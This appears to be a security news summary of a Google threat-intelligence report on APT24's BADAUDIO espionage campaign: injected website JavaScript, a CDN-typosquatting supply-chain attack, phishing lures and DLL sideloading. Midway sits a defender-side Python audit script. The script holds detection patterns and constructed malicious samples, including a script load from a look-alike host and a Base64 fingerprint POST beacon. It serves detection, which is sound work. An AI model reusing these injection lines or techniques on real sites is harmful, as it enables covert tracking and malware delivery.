The Google Threat Intelligence Group (GTIG) has unveiled a sophisticated three-year cyber espionage campaign orchestrated by APT24, a China-nexus threat actor, targeting organizations primarily in Taiwan through the deployment of BADAUDIO malware and strategic web compromises.
APT24’s operations have undergone a significant transformation since November 2022. Initially, the threat actor compromised over 20 legitimate public websites spanning diverse sectors, from industrial concerns to recreational goods, injecting malicious JavaScript payloads to deliver BADAUDIO, a highly obfuscated first-stage downloader.
This opportunistic approach has since evolved into more sophisticated tactics, including supply chain attacks and targeted phishing campaigns explicitly designed for Taiwanese organizations.
The BADAUDIO malware serves as a custom C++ downloader that establishes persistent access to victim networks. Upon execution, it downloads, decrypts, and executes AES-encrypted payloads from hard-coded command-and-control servers.
In confirmed cases, the decrypted payload was identified as Cobalt Strike Beacon, featuring a unique watermark previously observed in separate APT24 operations.
The threat actor’s initial campaign weaponized legitimate websites by injecting JavaScript that specifically excluded macOS, iOS, Android, and Internet Explorer/Edge browsers, focusing exclusively on Windows systems.
Using the FingerprintJS library, the malware generated unique browser fingerprints transmitted to attacker-controlled domains for validation.
Successful fingerprint verification triggered fabricated pop-up dialogs mimicking legitimate software updates, tricking users into downloading and executing BADAUDIO malware.
BADAUDIO typically manifests as a malicious Dynamic Link Library exploiting DLL Search Order Hijacking for execution.

Recent variants include encrypted archives containing VBS, BAT, and LNK files that automate DLL placement, establish persistence through startup entries, and trigger DLL sideloading, minimizing direct indicators of compromise.
Supply Chain Compromise Amplifies Impact
In July 2024, APT24 escalated operations by compromising a regional digital marketing firm in Taiwan, affecting over 1,000 domains in a devastating supply chain attack.

The firm experienced multiple re-compromises throughout the year, demonstrating APT24’s persistent commitment.
Attackers injected malicious code into widely used JavaScript libraries, leveraging typosquatting domains to impersonate legitimate Content Delivery Networks.

During a July 2025 re-compromise, adversaries concealed highly obfuscated scripts within maliciously modified JSON files, an uncommon tactic that obscured payloads in file types not typically associated with code execution.
The malware dynamically loaded legitimate jQuery and FingerprintJS2 libraries, employed advanced fingerprinting using x64hash128 browser hashes, and transmitted Base64-encoded reconnaissance data through covert POST requests to attacker endpoints.
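As an added, defender-side illustration (not code from GTIG or from the report), the following Python audit flags served JavaScript and JSON assets that show the traits described for both the initial website injections and the JSON-hidden supply-chain scripts: OS gating paired with browser fingerprinting, Base64-encoded POST beacons, executable code inside JSON string values, and script hosts that resemble but are not an allowlisted CDN. The allowlist, similarity threshold and sample files are assumptions constructed for this example.

```python
import json
import re
from difflib import SequenceMatcher

# Hosts this site legitimately loads scripts from (assumption: replace with your own allowlist).
KNOWN_CDNS = {"code.jquery.com", "cdnjs.cloudflare.com", "cdn.jsdelivr.net"}
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
# Heuristics drawn from the campaign description: UA gating plus fingerprinting, Base64 POST beacons, JS hidden in JSON.
OS_GATE_RE = re.compile(r"navigator\.(userAgent|platform)")
FINGERPRINT_RE = re.compile(r"Fingerprint(JS)?2?|x64hash128")
B64_RE = re.compile(r"\bbtoa\s*\(")
POST_RE = re.compile(r"method\s*:\s*['\"]POST['\"]|\.open\s*\(\s*['\"]POST")
EXEC_RE = re.compile(r"\b(eval|Function)\s*\(|createElement\s*\(\s*['\"]script")

def strings_in(node):
    """Yield every string value nested anywhere in a parsed JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, (dict, list)):
        for child in (node.values() if isinstance(node, dict) else node):
            yield from strings_in(child)

def lookalike_hosts(text):
    """Hosts that closely resemble an allowlisted CDN but are not on the allowlist (typosquat candidates)."""
    found = {h.lower() for h in HOST_RE.findall(text)} - KNOWN_CDNS
    return sorted(h for h in found
                  if any(SequenceMatcher(None, h, c).ratio() > 0.8 for c in KNOWN_CDNS))

def audit_asset(name, body):
    """Return finding labels for one served JS/JSON asset; an empty list means nothing matched."""
    findings = []
    if name.endswith(".json"):
        try:
            payload = " ".join(strings_in(json.loads(body)))  # only string values can hide code
        except ValueError:
            return ["json-unparseable"]  # a JSON file that is not JSON deserves a look on its own
        if EXEC_RE.search(payload):
            findings.append("executable-code-in-json")
    if OS_GATE_RE.search(body) and FINGERPRINT_RE.search(body):
        findings.append("os-gated-fingerprinting")
    if B64_RE.search(body) and POST_RE.search(body):
        findings.append("base64-post-beacon")
    return findings + ["lookalike-cdn:" + h for h in lookalike_hosts(body)]

# Constructed samples for this example, not real campaign artifacts; the look-alike host is invented.
BENIGN_JS = "s.src='https://code.jquery.com/jquery.min.js';"
SUSPICIOUS_JS = ("if(!/Mac|iPhone|Android/.test(navigator.userAgent)){s.src='https://cdn.jsde1ivr.net/fp2.js';"
                 "fetch('/c',{method:'POST',body:btoa(x64hash128)})}")
SUSPICIOUS_JSON = json.dumps({"theme": "dark",
                              "init": "var s=document.createElement('script');s.src='https://cdn.jsde1ivr.net/a.js'"})
```

Run audit_asset(name, body) over every JavaScript and JSON file your web server or CDN serves; the constructed tracker sample yields three findings, the JSON sample two, and the benign file none.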
Complementing web-based attacks, APT24 conducted highly targeted social engineering campaigns using lures such as emails purporting to be from animal rescue organizations.
The group abused legitimate cloud storage platforms including Google Drive and OneDrive to distribute encrypted archives containing BADAUDIO, though Google successfully diverted these messages to spam.
Pixel tracking links confirmed email opens and validated target interest for subsequent exploitation.
Industry Implications
GTIG has implemented comprehensive protective measures, adding all identified websites, domains, and files to Safe Browsing blocklists to protect users across major browsers.
The team conducted victim notifications with technical details to compromised sites, enabling affected organizations to secure their infrastructure and prevent future infections.
This campaign exemplifies the continued evolution of PRC-nexus threat actors employing increasingly stealthy tactics to avoid detection.
The sophisticated use of control flow flattening, an obfuscation technique that dismantles natural program logic into disconnected blocks governed by central dispatchers, significantly impedes both automated and manual reverse engineering efforts.
GTIG emphasizes that sharing these findings with the security community enhances threat hunting capabilities and strengthens user protections across the industry against persistent and adaptive espionage threats like APT24.
